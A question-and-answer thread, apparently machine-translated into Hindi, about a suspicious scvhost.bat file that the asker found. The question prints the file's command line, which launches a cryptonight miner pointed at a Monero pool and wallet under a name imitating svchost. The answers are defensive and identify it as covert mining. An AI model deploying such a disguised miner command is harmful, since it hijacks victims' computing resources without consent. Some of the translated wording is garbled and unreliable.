क्या यह scvhost.bat क्रिप्टोनाइट के साथ वायरस या खनिक है?


17

मुझे बस यह .bat फ़ाइल मिली है जिसे scvhost.bat नाम दिया गया था। फ़ाइल में यह सामग्री थी:

scvhost -a cryptonight -o stratum+tcp://xmr-eu.dwarfpool.com:8005 -u 48uh2mrdkdq2tQysfkX2hZDi2hkRua4GX13EqY8djJ5xNXhez7baztVWbwXa34vUMveKAzAiA4j8xgUi29TpKXpm42jqV6H.microSf -p MXXXXXX-t 02

क्या यह एक वायरस है (जानकारी आदि चुराने के लिए) या एक लगाया हुआ खान? मैं चिंतित हूं क्योंकि मैं भी क्रिप्टो मुद्राओं में डब करता हूं और stratumएक मुद्रा है जिसका उल्लेख उपरोक्त फाइल में किया गया है।


1
यह वास्तव में एक खान में काम करनेवाला लगता है। यह देखते हुए कि आप स्वयं क्रिप्टो मुद्राओं का उपयोग करते हैं, यदि आप भी मेरा उपयोग करते हैं, तो सुनिश्चित करें कि यह वास्तव में आप जो भी मेरा उपयोग करते हैं उसका हिस्सा नहीं है। आप .bat एक्सटेंशन को किसी अन्य चीज़ में बदलकर ऐसा कर सकते हैं और देखें कि क्या आप रिबूट के बाद भी सामान्य रूप से मेरा उपयोग कर सकते हैं। इस फाइल के बारे में एक बात मुझे अजीब लगती है, वह यह है कि आम तौर पर यह कहा जाता है कि यह scvhost है जो इसे निष्पादित करता है और बैट फाइल दोनों का नाम है। आम तौर पर यह एक लूप में परिणाम होगा।
LPChip

2
@VirtualAnomaly मुझे लगता है कि आप यहाँ उल्लिखित sCVhost के साथ sVChost गलत हैं। हां, मैं इस बात से बहुत परिचित हूं कि svchost होस्टिंग सेवाओं के लिए मैकेनिक है।
LPChip

2
@LPChip मेरी क्षमायाचना, आप सही हैं, मुझसे गलती हुई थी।
वर्चुअल अनोमली

2
किसी ने बहुत अधिक स्टारक्राफ्ट खेला, मुझे लगता है।
कोडइंचोज

1
@lucidbrot SCVs खेल की दौड़ (टेरेंस) में से एक की "बिल्डर" इकाई है, जिस स्थिति में यह "स्पेस कंस्ट्रक्शन व्हीकल" के लिए खड़ा है।
हारून

जवाबों:


34

यह किसी प्रकार का खनन लगता है, विशेष रूप से चूंकि पैरामीटर में URL से लेकर खनन पूल तक होता है। हालांकि, आपको यह सुनिश्चित करने की आवश्यकता है कि बाइनरी में क्या है। मीनार की विकास टीम द्वारा की गई रिलीज़ के साथ आपके सिस्टम को मिले बाइनरी के चेकसम की तुलना करना समझदारी होगी। अगर वे अलग हैं; आप सिस्टम को असुरक्षित मानते हैं।

एक और मुद्दा यह है कि आपको इस माइनर के बारे में पता चला है (शायद इसलिए कि यह सीपीयू का बहुत उपयोग कर रहा था), लेकिन आपको नहीं पता कि आपके सिस्टम पर और क्या हुआ है। यदि कोई घुसपैठिया खनन शुरू कर सकता है, तो वे अन्य चीजें भी लॉन्च कर सकते हैं। यह बैकअप से उबरने या फिर नए सिरे से स्थापित करने के लिए एक अच्छा विचार हो सकता है।

हमारी साइट का प्रयोग करके, आप स्वीकार करते हैं कि आपने हमारी Cookie Policy और निजता नीति को पढ़ और समझा लिया है।
Licensed under cc by-sa 3.0 with attribution required.